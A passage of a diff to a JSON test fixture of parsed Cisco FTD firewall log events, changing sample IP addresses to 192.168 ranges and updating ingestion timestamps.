outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", "action": "firewall-rule", @@ -1499,8 +1499,8 @@ }, "destination": { "port": 40443, - "address": "192.0.0.88", - "ip": "192.0.0.88" + "address": "192.168.0.88", + "ip": "192.168.0.88" }, "source": { "port": 49737, @@ -1536,13 +1536,13 @@ "related": { "ip": [ "10.0.0.46", - "192.0.0.88" + "192.168.0.88" ] }, "event": { "severity": 5, - "ingested": "2021-09-07T12:22:01.768663800Z", - "original": "Apr 30 2013 09:22:39: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49737) -\u003e outside/192.0.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", + "ingested": "2021-12-09T13:35:10.983075700Z", + "original": "Apr 30 2013 09:22:39: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49737) -\u003e outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", "action": "firewall-rule", @@ -1569,8 +1569,8 @@ }, "destination": { "port": 40443, - "address": "192.0.0.88", - "ip": "192.0.0.88" + "address": "192.168.0.88", + "ip": "192.168.0.88" }, "source": { "port": 49738, @@ -1606,13 +1606,13 @@ "related": { "ip": [ "10.0.0.46", - "192.0.0.88" + "192.168.0.88" ] }, "event": { "severity": 5, - "ingested": "2021-09-07T12:22:01.768665400Z", - "original": "Apr 30 2013 09:22:40: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49738) -\u003e outside/192.0.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", + "ingested": "2021-12-09T13:35:10.983081Z", + "original": "Apr 30 2013 09:22:40: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49738) -\u003e outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", "action": "firewall-rule", @@ -1639,8 +1639,8 @@ }, "destination": { "port": 40443, - "address": "192.0.0.88", - "ip": "192.0.0.88" + "address": "192.168.0.88", + "ip": "192.168.0.88" }, "source": { "port": 49746, @@ -1676,13 +1676,13 @@ "related": { "ip": [ "10.0.0.46", - "192.0.0.88" + "192.168.0.88" ] }, "event": { "severity": 5, - "ingested": "2021-09-07T12:22:01.768667400Z", - "original": "Apr 30 2013 09:22:41: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49746) -\u003e outside/192.0.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", + "ingested": "2021-12-09T13:35:10.983085900Z", + "original": "Apr 30 2013 09:22:41: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49746) -\u003e outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", "action": "firewall-rule", @@ -1709,8 +1709,8 @@ }, "destination": { "port": 2000, - "address": "192.0.0.89", - "ip": "192.0.0.89" + "address": "192.168.0.89", + "ip": "192.168.0.89" }, "source": { "port": 2007, @@ -1746,13 +1746,13 @@ "related": { "ip": [ "10.0.0.16", - "192.0.0.89" + "192.168.0.89" ] }, "event": { "severity": 5, - "ingested": "2021-09-07T12:22:01.768669Z", - "original": "Apr 30 2013 09:22:47: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2007) -\u003e outside/192.0.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", + "ingested": "2021-12-09T13:35:10.983089800Z", + "original": "Apr 30 2013 09:22:47: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2007) -\u003e outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", "action": "firewall-rule", @@ -1821,7 +1821,7 @@ }, "event": { "severity": 5, - "ingested": "2021-09-07T12:22:01.768670600Z", + "ingested": "2021-12-09T13:35:10.983094600Z", "original": "Apr 30 2013 09:22:48: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.13(43013) -\u003e dmz/192.168.33.31(25) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", @@ -1849,8 +1849,8 @@ }, "destination": { "port": 2000, - "address": "192.0.0.89", - "ip": "192.0.0.89" + "address": "192.168.0.89", + "ip": "192.168.0.89" }, "source": { "port": 2008, @@ -1886,13 +1886,13 @@ "related": { "ip": [ "10.0.0.16", - "192.0.0.89" + "192.168.0.89" ] }, "event": { "severity": 5, - "ingested": "2021-09-07T12:22:01.768672200Z", - "original": "Apr 30 2013 09:22:56: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2008) -\u003e outside/192.0.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", + "ingested": "2021-12-09T13:35:10.983100300Z", + "original": "Apr 30 2013 09:22:56: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2008) -\u003e outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", "action": "firewall-rule", @@ -1924,8 +1924,8 @@ }, "source": { "port": 137, - "address": "192.0.2.66", - "ip": "192.0.2.66" + "address": "192.168.2.66", + "ip": "192.168.2.66" }, "tags": [ "preserve_original_event" @@ -1951,14 +1951,14 @@ }, "related": { "ip": [ - "192.0.2.66", + "192.168.2.66", "10.1.2.42" ] }, "event": { "severity": 2, - "ingested": "2021-09-07T12:22:01.768673700Z", - "original": "Apr 30 2013 09:23:02: %FTD-2-106006: Deny inbound UDP from 192.0.2.66/137 to 10.1.2.42/137 on interface inside", + "ingested": "2021-12-09T13:35:10.983104800Z", + "original": "Apr 30 2013 09:23:02: %FTD-2-106006: Deny inbound UDP from 192.168.2.66/137 to 10.1.2.42/137 on interface inside", "code": "106006", "kind": "event", "action": "firewall-rule", @@ -1988,8 +1988,8 @@ }, "source": { "port": 12981, - "address": "192.0.2.66", - "ip": "192.0.2.66" + "address": "192.168.2.66", + "ip": "192.168.2.66" }, "tags": [ "preserve_original_event" @@ -2011,14 +2011,14 @@ }, "related": { "ip": [ - "192.0.2.66", + "192.168.2.66", "10.1.5.60" ] }, "event": { "severity": 2, - "ingested": "2021-09-07T12:22:01.768675300Z", - "original": "Apr 30 2013 09:23:03: %FTD-2-106007: Deny inbound UDP from 192.0.2.66/12981 to 10.1.5.60/53 due to DNS Query", + "ingested": "2021-12-09T13:35:10.983108400Z", + "original": "Apr 30 2013 09:23:03: %FTD-2-106007: Deny inbound UDP from 192.168.2.66/12981 to 10.1.5.60/53 due to DNS Query", "code": "106007", "kind": "event", "action": "firewall-rule", @@ -2041,8 +2041,8 @@ }, "destination": { "port": 2000, - "address": "192.0.0.89", - "ip": "192.0.0.89" + "address": "192.168.0.89", + "ip": "192.168.0.89" }, "source": { "port": 2009, @@ -2078,13 +2078,13 @@ "related": { "ip": [ "10.0.0.16", - "192.0.0.89" + "192.168.0.89" ] }, "event": { "severity": 5, - "ingested": "2021-09-07T12:22:01.768677200Z", - "original": "Apr 30 2013 09:23:06: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2009) -\u003e outside/192.0.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", + "ingested": "2021-12-09T13:35:10.983112900Z", + "original": "Apr 30 2013 09:23:06: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2009) -\u003e outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", "action": "firewall-rule", @@ -2111,8 +2111,8 @@ }, "destination": { "port": 40443, - "address": "192.0.0.88", - "ip": "192.0.0.88" + "address": "192.168.0.88", + "ip": "192.168.0.88" }, "source": { "port": 49776, @@ -2148,13 +2148,13 @@ "related": { "ip": [ "10.0.0.46", - "192.0.0.88" + "192.168.0.88" ] }, "event": { "severity": 5, - "ingested": "2021-09-07T12:22:01.768678800Z", - "original": "Apr 30 2013 09:23:08: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49776) -\u003e outside/192.0.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", + "ingested": "2021-12-09T13:35:10.983117Z", + "original": "Apr 30 2013 09:23:08: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49776) -\u003e outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", "action": "firewall-rule", @@ -2181,8 +2181,8 @@ }, "destination": { "port": 2000, - "address": "192.0.0.89", - "ip": "192.0.0.89" + "address": "192.168.0.89", + "ip": "192.168.0.89" }, "source": { "port": 2010, @@ -2218,13 +2218,13 @@ "related": { "ip": [ "10.0.0.16", - "192.0.0.89" + "192.168.0.89" ] }, "event": { "severity": 5, - "ingested": "2021-09-07T12:22:01.768680400Z", - "original": "Apr 30 2013 09:23:15: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2010) -\u003e outside/192.0.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", + "ingested": "2021-12-09T13:35:10.983121900Z", + "original": "Apr 30 2013 09:23:15: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2010) -\u003e outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", "action": "firewall-rule", @@ -2251,8 +2251,8 @@ }, "destination": { "port": 2000, - "address": "192.0.0.89", - "ip": "192.0.0.89" + "address": "192.168.0.89", + "ip": "192.168.0.89" }, "source": { "port": 2011, @@ -2288,13 +2288,13 @@ "related": { "ip": [ "10.0.0.16", - "192.0.0.89" + "192.168.0.89" ] }, "event": { "severity": 5, - "ingested": "2021-09-07T12:22:01.768682100Z", - "original": "Apr 30 2013 09:23:24: %FTD-5-106100: access-list acl_in denied tcp inside/10.0.0.16(2011) -\u003e outside/192.0.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", + "ingested": "2021-12-09T13:35:10.983127900Z", + "original": "Apr 30 2013 09:23:24: %FTD-5-106100: access-list acl_in denied tcp inside/10.0.0.16(2011) -\u003e outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", "action": "firewall-rule", @@ -2321,8 +2321,8 @@ }, "destination": { "port": 2000, - "address": "192.0.0.89", - "ip": "192.0.0.89" + "address": "192.168.0.89", + "ip": "192.168.0.89" }, "source": { "port": 2012, @@ -2358,13 +2358,13 @@ "related": { "ip": [ "10.0.0.16", - "192.0.0.89" + "192.168.0.89" ] }, "event": { "severity": 5, - "ingested": "2021-09-07T12:22:01.768683600Z", - "original": "Apr 30 2013 09:23:34: %FTD-5-106100: access-list acl_in denied tcp inside/10.0.0.16(2012) -\u003e outside/192.0.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", + "ingested": "2021-12-09T13:35:10.983133700Z", + "original": "Apr 30 2013 09:23:34: %FTD-5-106100: access-list acl_in denied tcp inside/10.0.0.16(2012) -\u003e outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", "action": "firewall-rule", @@ -2396,8 +2396,8 @@ }, "source": { "port": 53638, - "address": "192.0.2.126", - "ip": "192.0.2.126" + "address": "192.168.2.126", + "ip": "192.168.2.126" }, "tags": [ "preserve_original_event" @@ -2427,14 +2427,14 @@ }, "related": { "ip": [ - "192.0.2.126", + "192.168.2.126", "10.0.0.132" ] }, "event": { "severity": 4, - "ingested": "2021-09-07T12:22:01.768704400Z", - "original": "Apr 30 2013 09:23:40: %FTD-4-106023: Deny tcp src outside:192.0.2.126/53638 dst inside:10.0.0.132/8111 by access-group \"acl_out\" [0x71761f18, 0x0]", + "ingested": "2021-12-09T13:35:10.983139500Z", + "original": "Apr 30 2013 09:23:40: %FTD-4-106023: Deny tcp src outside:192.168.2.126/53638 dst inside:10.0.0.132/8111 by access-group \"acl_out\" [0x71761f18, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -2466,8 +2466,8 @@ }, "source": { "port": 53638, - "address": "192.0.2.126", - "ip": "192.0.2.126" + "address": "192.168.2.126", + "ip": "192.168.2.126" }, "tags": [ "preserve_original_event" @@ -2497,14 +2497,14 @@ }, "related": { "ip": [ - "192.0.2.126", + "192.168.2.126", "10.0.0.132" ] }, "event": { "severity": 4, - "ingested": "2021-09-07T12:22:01.768707400Z", - "original": "Apr 30 2013 09:23:41: %FTD-4-106023: Deny tcp src outside:192.0.2.126/53638 dst inside:10.0.0.132/8111 by access-group \"acl_out\" [0x71761f18, 0x0]", + "ingested": "2021-12-09T13:35:10.983145200Z", + "original": "Apr 30 2013 09:23:41: %FTD-4-106023: Deny tcp src outside:192.168.2.126/53638 dst inside:10.0.0.132/8111 by access-group \"acl_out\" [0x71761f18, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -2531,8 +2531,8 @@ }, "destination": { "port": 40443, - "address": "192.0.0.88", - "ip": "192.0.0.88" + "address": "192.168.0.88", + "ip": "192.168.0.88" }, "source": { "port": 49840, @@ -2568,13 +2568,13 @@ "related": { "ip": [ "10.0.0.46", - "192.0.0.88" + "192.168.0.88" ] }, "event": { "severity": 5, - "ingested": "2021-09-07T12:22:01.768709600Z", - "original": "Apr 30 2013 09:23:43: %FTD-5-106100: access-list acl_in est-allowed tcp inside/10.0.0.46(49840) -\u003e outside/192.0.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", + "ingested": "2021-12-09T13:35:10.983150900Z", + "original": "Apr 30 2013 09:23:43: %FTD-5-106100: access-list acl_in est-allowed tcp inside/10.0.0.46(49840) -\u003e outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", "action": "firewall-rule", @@ -2601,8 +2601,8 @@ }, "destination": { "port": 2000, - "address": "192.0.0.89", - "ip": "192.0.0.89" + "address": "192.168.0.89", + "ip": "192.168.0.89" }, "source": { "port": 2013, @@ -2638,13 +2638,13 @@ "related": { "ip": [ "10.0.0.16", - "192.0.0.89" + "192.168.0.89" ] }, "event": { "severity": 5, - "ingested": "2021-09-07T12:22:01.768711300Z", - "original": "Apr 30 2013 09:23:43: %FTD-5-106100: access-list acl_in est-allowed tcp inside/10.0.0.16(2013) -\u003e outside/192.0.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", + "ingested": "2021-12-09T13:35:10.983155200Z", + "original": "Apr 30 2013 09:23:43: %FTD-5-106100: access-list acl_in est-allowed tcp inside/10.0.0.16(2013) -\u003e outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", "action": "firewall-rule", @@ -2671,8 +2671,8 @@ }, "destination": { "port": 2000, - "address": "192.0.0.99", - "ip": "192.0.0.99" + "address": "192.168.0.99", + "ip": "192.168.0.99" }, "source": { "port": 2241, @@ -2708,13 +2708,13 @@ "related": { "ip": [ "10.0.0.16", - "192.0.0.99" + "192.168.0.99" ] }, "event": { "severity": 5, - "ingested": "2021-09-07T12:22:01.768712900Z", - "original": "Apr 15 2018 09:34:34 EDT: %FTD-session-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2241) -\u003e outside/192.0.0.99(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", + "ingested": "2021-12-09T13:35:10.983158800Z", + "original": "Apr 15 2018 09:34:34 EDT: %FTD-session-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2241) -\u003e outside/192.168.0.99(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", "action": "firewall-rule", @@ -2792,7 +2792,7 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:22:01.768714400Z", + "ingested": "2021-12-09T13:35:10.983163200Z", "original": "Dec 11 2018 08:01:24 127.0.0.1: %FTD-6-302015: Built outbound UDP connection 447235 for outside:192.168.77.12/11180 (192.168.77.12/11180) to identity:10.0.13.13/80 (10.0.13.13/80)", "code": "302015", "kind": "event", @@ -2822,8 +2822,8 @@ }, "destination": { "port": 53, - "address": "192.0.0.12", - "ip": "192.0.0.12" + "address": "192.168.0.12", + "ip": "192.168.0.12" }, "source": { "port": 5555, @@ -2863,7 +2863,7 @@ ], "ip": [ "192.168.1.33", - "192.0.0.12" + "192.168.0.12" ] }, "host": { @@ -2871,8 +2871,8 @@ }, "event": { "severity": 4, - "ingested": "2021-09-07T12:22:01.768717100Z", - "original": "Dec 11 2018 08:01:24 127.0.0.1: %FTD-4-106023: Deny udp src dmz:192.168.1.33/5555 dst outside:192.0.0.12/53 by access-group \"dmz\" [0x123a465e, 0x4c7bf613]", + "ingested": "2021-12-09T13:35:10.983168900Z", + "original": "Dec 11 2018 08:01:24 127.0.0.1: %FTD-4-106023: Deny udp src dmz:192.168.1.33/5555 dst outside:192.168.0.12/53 by access-group \"dmz\" [0x123a465e, 0x4c7bf613]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -2899,8 +2899,8 @@ }, "destination": { "port": 53, - "address": "192.0.0.12", - "ip": "192.0.0.12" + "address": "192.168.0.12", + "ip": "192.168.0.12" }, "source": { "port": 5555, @@ -2940,7 +2940,7 @@ ], "ip": [ "192.168.1.33", - "192.0.0.12" + "192.168.0.12" ] }, "host": { @@ -2948,8 +2948,8 @@ }, "event": { "severity": 4, - "ingested": "2021-09-07T12:22:01.768718800Z", - "original": "Dec 11 2018 08:01:24 127.0.0.1: %FTD-4-106023: Deny udp src dmz:192.168.1.33/5555 dst outside:192.0.0.12/53 by access-group \"dmz\" [0x123a465e, 0x4c7bf613]", + "ingested": "2021-12-09T13:35:10.983173900Z", + "original": "Dec 11 2018 08:01:24 127.0.0.1: %FTD-4-106023: Deny udp src dmz:192.168.1.33/5555 dst outside:192.168.0.12/53 by access-group \"dmz\" [0x123a465e, 0x4c7bf613]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -2981,8 +2981,8 @@ }, "source": { "port": 1234, - "address": "192.0.2.222", - "ip": "192.0.2.222" + "address": "192.168.2.222", + "ip": "192.168.2.222" }, "tags": [ "preserve_original_event" @@ -3018,7 +3018,7 @@ "OCSP_Server" ], "ip": [ - "192.0.2.222" + "192.168.2.222" ] }, "host": { @@ -3026,8 +3026,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:22:01.768723600Z", - "original": "Dec 11 2018 08:01:31 127.0.0.1: %FTD-6-302013: Built outbound TCP connection 447236 for outside:192.0.2.222/1234 (192.0.2.222/1234) to dmz:OCSP_Server/5678 (OCSP_Server/5678)", + "ingested": "2021-12-09T13:35:10.983177900Z", + "original": "Dec 11 2018 08:01:31 127.0.0.1: %FTD-6-302013: Built outbound TCP connection 447236 for outside:192.168.2.222/1234 (192.168.2.222/1234) to dmz:OCSP_Server/5678 (OCSP_Server/5678)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -3043,7 +3043,7 @@ "mapped_destination_host": "OCSP_Server", "destination_interface": "dmz", "mapped_source_port": 1234, - "mapped_source_ip": "192.0.2.222", + "mapped_source_ip": "192.168.2.222", "connection_id": "447236", "source_interface": "outside", "mapped_destination_port": 5678 @@ -3061,8 +3061,8 @@ }, "source": { "port": 1234, - "address": "192.0.2.222", - "ip": "192.0.2.222" + "address": "192.168.2.222", + "ip": "192.168.2.222" }, "tags": [ "preserve_original_event" @@ -3098,7 +3098,7 @@ "OCSP_Server" ], "ip": [ - "192.0.2.222" + "192.168.2.222" ] }, "host": { @@ -3106,8 +3106,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:22:01.768725500Z", - "original": "Dec 11 2018 08:01:31 127.0.0.1: %FTD-6-302013: Built outbound TCP connection 447236 for outside:192.0.2.222/1234 (192.0.2.222/1234) to dmz:OCSP_Server/5678 (OCSP_Server/5678)", + "ingested": "2021-12-09T13:35:10.983182900Z", + "original": "Dec 11 2018 08:01:31 127.0.0.1: %FTD-6-302013: Built outbound TCP connection 447236 for outside:192.168.2.222/1234 (192.168.2.222/1234) to dmz:OCSP_Server/5678 (OCSP_Server/5678)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -3123,7 +3123,7 @@ "mapped_destination_host": "OCSP_Server", "destination_interface": "dmz", "mapped_source_port": 1234, - "mapped_source_ip": "192.0.2.222", + "mapped_source_ip": "192.168.2.222", "connection_id": "447236", "source_interface": "outside", "mapped_destination_port": 5678 @@ -3141,8 +3141,8 @@ }, "source": { "port": 1234, - "address": "192.0.2.222", - "ip": "192.0.2.222" + "address": "192.168.2.222", + "ip": "192.168.2.222" }, "tags": [ "preserve_original_event" @@ -3177,7 +3177,7 @@ "127.0.0.1" ], "ip": [ - "192.0.2.222", + "192.168.2.222", "192.168.1.34" ] }, @@ -3188,8 +3188,8 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-09-07T12:22:01.768727100Z", - "original": "Dec 11 2018 08:01:31 127.0.0.1: %FTD-6-302014: Teardown TCP connection 447236 for outside:192.0.2.222/1234 to dmz:192.168.1.34/5678 duration 0:00:00 bytes 14804 TCP FINs", + "ingested": "2021-12-09T13:35:10.983186900Z", + "original": "Dec 11 2018 08:01:31 127.0.0.1: %FTD-6-302014: Teardown TCP connection 447236 for outside:192.168.2.222/1234 to dmz:192.168.1.34/5678 duration 0:00:00 bytes 14804 TCP FINs", "code": "302014", "kind": "event", "start": "2018-12-11T08:01:31.000Z", @@ -3222,8 +3222,8 @@ }, "source": { "port": 1234, - "address": "192.0.2.222", - "ip": "192.0.2.222" + "address": "192.168.2.222", + "ip": "192.168.2.222" }, "tags": [ "preserve_original_event" @@ -3258,7 +3258,7 @@ "127.0.0.1" ], "ip": [ - "192.0.2.222", + "192.168.2.222", "192.168.1.35" ] }, @@ -3269,8 +3269,8 @@ "severity": 6, "duration": 68000000000, "reason": "TCP FINs", - "ingested": "2021-09-07T12:22:01.768728900Z", - "original": "Dec 11 2018 08:01:38 127.0.0.1: %FTD-6-302014: Teardown TCP connection 447234 for outside:192.0.2.222/1234 to dmz:192.168.1.35/5678 duration 0:01:08 bytes 134781 TCP FINs", + "ingested": "2021-12-09T13:35:10.983191Z", + "original": "Dec 11 2018 08:01:38 127.0.0.1: %FTD-6-302014: Teardown TCP connection 447234 for outside:192.168.2.222/1234 to dmz:192.168.1.35/5678 duration 0:01:08 bytes 134781 TCP FINs", "code": "302014", "kind": "event", "start": "2018-12-11T08:00:30.000Z", @@ -3303,8 +3303,8 @@ }, "source": { "port": 1234, - "address": "192.0.2.222", - "ip": "192.0.2.222" + "address": "192.168.2.222", + "ip": "192.168.2.222" }, "tags": [ "preserve_original_event" @@ -3339,7 +3339,7 @@ "127.0.0.1" ], "ip": [ - "192.0.2.222", + "192.168.2.222", "192.168.1.35" ] }, @@ -3350,8 +3350,8 @@ "severity": 6, "duration": 68000000000, "reason": "TCP FINs", - "ingested": "2021-09-07T12:22:01.768730900Z", - "original": "Dec 11 2018 08:01:38 127.0.0.1: %FTD-6-302014: Teardown TCP connection 447234 for outside:192.0.2.222/1234 to dmz:192.168.1.35/5678 duration 0:01:08 bytes 134781 TCP FINs", + "ingested": "2021-12-09T13:35:10.983195300Z", + "original": "Dec 11 2018 08:01:38 127.0.0.1: %FTD-6-302014: Teardown TCP connection 447234 for outside:192.168.2.222/1234 to dmz:192.168.1.35/5678 duration 0:01:08 bytes 134781 TCP FINs", "code": "302014", "kind": "event", "start": "2018-12-11T08:00:30.000Z", @@ -3384,8 +3384,8 @@ }, "source": { "port": 1234, - "address": "192.0.2.222", - "ip": "192.0.2.222" + "address": "192.168.2.222", + "ip": "192.168.2.222" }, "tags": [ "preserve_original_event" @@ -3414,7 +3414,7 @@ "127.0.0.1" ], "ip": [ - "192.0.2.222", + "192.168.2.222", "192.168.1.34" ] }, @@ -3423,8 +3423,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:22:01.768732400Z", - "original": "Dec 11 2018 08:01:38 127.0.0.1: %FTD-6-106015: Deny TCP (no connection) from 192.0.2.222/1234 to 192.168.1.34/5679 flags RST on interface outside", + "ingested": "2021-12-09T13:35:10.983199300Z", + "original": "Dec 11 2018 08:01:38 127.0.0.1: %FTD-6-106015: Deny TCP (no connection) from 192.168.2.222/1234 to 192.168.1.34/5679 flags RST on interface outside", "code": "106015", "kind": "event", "action": "firewall-rule", @@ -3454,8 +3454,8 @@ }, "source": { "port": 1234, - "address": "192.0.2.222", - "ip": "192.0.2.222" + "address": "192.168.2.222", + "ip": "192.168.2.222" }, "tags": [ "preserve_original_event" @@ -3484,7 +3484,7 @@ "127.0.0.1" ], "ip": [ - "192.0.2.222", + "192.168.2.222", "192.168.1.34" ] }, @@ -3493,8 +3493,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:22:01.768734Z", - "original": "Dec 11 2018 08:01:38 127.0.0.1: %FTD-6-106015: Deny TCP (no connection) from 192.0.2.222/1234 to 192.168.1.34/5679 flags RST on interface outside", + "ingested": "2021-12-09T13:35:10.983203800Z", + "original": "Dec 11 2018 08:01:38 127.0.0.1: %FTD-6-106015: Deny TCP (no connection) from 192.168.2.222/1234 to 192.168.1.34/5679 flags RST on interface outside", "code": "106015", "kind": "event", "action": "firewall-rule", @@ -3519,8 +3519,8 @@ }, "destination": { "port": 5000, - "address": "192.0.0.12", - "ip": "192.0.0.12" + "address": "192.168.0.12", + "ip": "192.168.0.12" }, "source": { "port": 5679, @@ -3560,7 +3560,7 @@ ], "ip": [ "192.168.1.34", - "192.0.0.12" + "192.168.0.12" ] }, "host": { @@ -3568,8 +3568,8 @@ }, "event": { "severity": 4, - "ingested": "2021-09-07T12:22:01.768735700Z", - "original": "Dec 11 2018 08:01:39 127.0.0.1: %FTD-4-106023: Deny udp src dmz:192.168.1.34/5679 dst outside:192.0.0.12/5000 by access-group \"dmz\" [0x123a465e, 0x8c20f21]", + "ingested": "2021-12-09T13:35:10.983209100Z", + "original": "Dec 11 2018 08:01:39 127.0.0.1: %FTD-4-106023: Deny udp src dmz:192.168.1.34/5679 dst outside:192.168.0.12/5000 by access-group \"dmz\" [0x123a465e, 0x8c20f21]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -3601,8 +3601,8 @@ }, "source": { "port": 1234, - "address": "192.0.2.222", - "ip": "192.0.2.222" + "address": "192.168.2.222", + "ip": "192.168.2.222" }, "tags": [ "preserve_original_event" @@ -3637,7 +3637,7 @@ "127.0.0.1" ], "ip": [ - "192.0.2.222", + "192.168.2.222", "192.168.1.34" ] }, @@ -3646,8 +3646,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:22:01.768737500Z", - "original": "Dec 11 2018 08:01:53 127.0.0.1: %FTD-6-302013: Built outbound TCP connection 447237 for outside:192.0.2.222/1234 (192.0.2.222/1234) to dmz:192.168.1.34/65000 (192.168.1.34/65000)", + "ingested": "2021-12-09T13:35:10.983214200Z", + "original": "Dec 11 2018 08:01:53 127.0.0.1: %FTD-6-302013: Built outbound TCP connection 447237 for outside:192.168.2.222/1234 (192.168.2.222/1234) to dmz:192.168.1.34/65000 (192.168.1.34/65000)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -3663,7 +3663,7 @@ "destination_interface": "dmz", "mapped_source_port": 1234, "mapped_destination_ip": "192.168.1.34", - "mapped_source_ip": "192.0.2.222", + "mapped_source_ip": "192.168.2.222", "connection_id": "447237", "source_interface": "outside", "mapped_destination_port": 65000 @@ -3681,8 +3681,8 @@ }, "source": { "port": 1234, - "address": "192.0.2.222", - "ip": "192.0.2.222" + "address": "192.168.2.222", + "ip": "192.168.2.222" }, "tags": [ "preserve_original_event" @@ -3717,7 +3717,7 @@ "127.0.0.1" ], "ip": [ - "192.0.2.222", + "192.168.2.222", "192.168.1.34" ] }, @@ -3726,8 +3726,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:22:01.768739100Z", - "original": "Dec 11 2018 08:01:53 127.0.0.1: %FTD-6-302013: Built outbound TCP connection 447237 for outside:192.0.2.222/1234 (192.0.2.222/1234) to dmz:192.168.1.34/65000 (192.168.1.34/65000)", + "ingested": "2021-12-09T13:35:10.983218100Z", + "original": "Dec 11 2018 08:01:53 127.0.0.1: %FTD-6-302013: Built outbound TCP connection 447237 for outside:192.168.2.222/1234 (192.168.2.222/1234) to dmz:192.168.1.34/65000 (192.168.1.34/65000)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -3743,7 +3743,7 @@ "destination_interface": "dmz", "mapped_source_port": 1234, "mapped_destination_ip": "192.168.1.34", - "mapped_source_ip": "192.0.2.222", + "mapped_source_ip": "192.168.2.222", "connection_id": "447237", "source_interface": "outside", "mapped_destination_port": 65000 @@ -3761,8 +3761,8 @@ }, "source": { "port": 1234, - "address": "192.0.2.222", - "ip": "192.0.2.222" + "address": "192.168.2.222", + "ip": "192.168.2.222" }, "tags": [ "preserve_original_event" @@ -3797,7 +3797,7 @@ "127.0.0.1" ], "ip": [ - "192.0.2.222", + "192.168.2.222", "10.10.10.10" ] }, @@ -3808,8 +3808,8 @@ "severity": 6, "duration": 86399000000000, "reason": "TCP FINs", - "ingested": "2021-09-07T12:22:01.768740700Z", - "original": "Dec 11 2018 08:01:53 127.0.0.1: %FTD-6-302014: Teardown TCP connection 447237 for outside:192.0.2.222/1234 to dmz:10.10.10.10/1235 duration 23:59:59 bytes 11420 TCP FINs", + "ingested": "2021-12-09T13:35:10.983225100Z", + "original": "Dec 11 2018 08:01:53 127.0.0.1: %FTD-6-302014: Teardown TCP connection 447237 for outside:192.168.2.222/1234 to dmz:10.10.10.10/1235 duration 23:59:59 bytes 11420 TCP FINs", "code": "302014", "kind": "event", "start": "2018-12-10T08:01:54.000Z", @@ -3881,7 +3881,7 @@ "event": { "severity": 6, "duration": 122000000000, - "ingested": 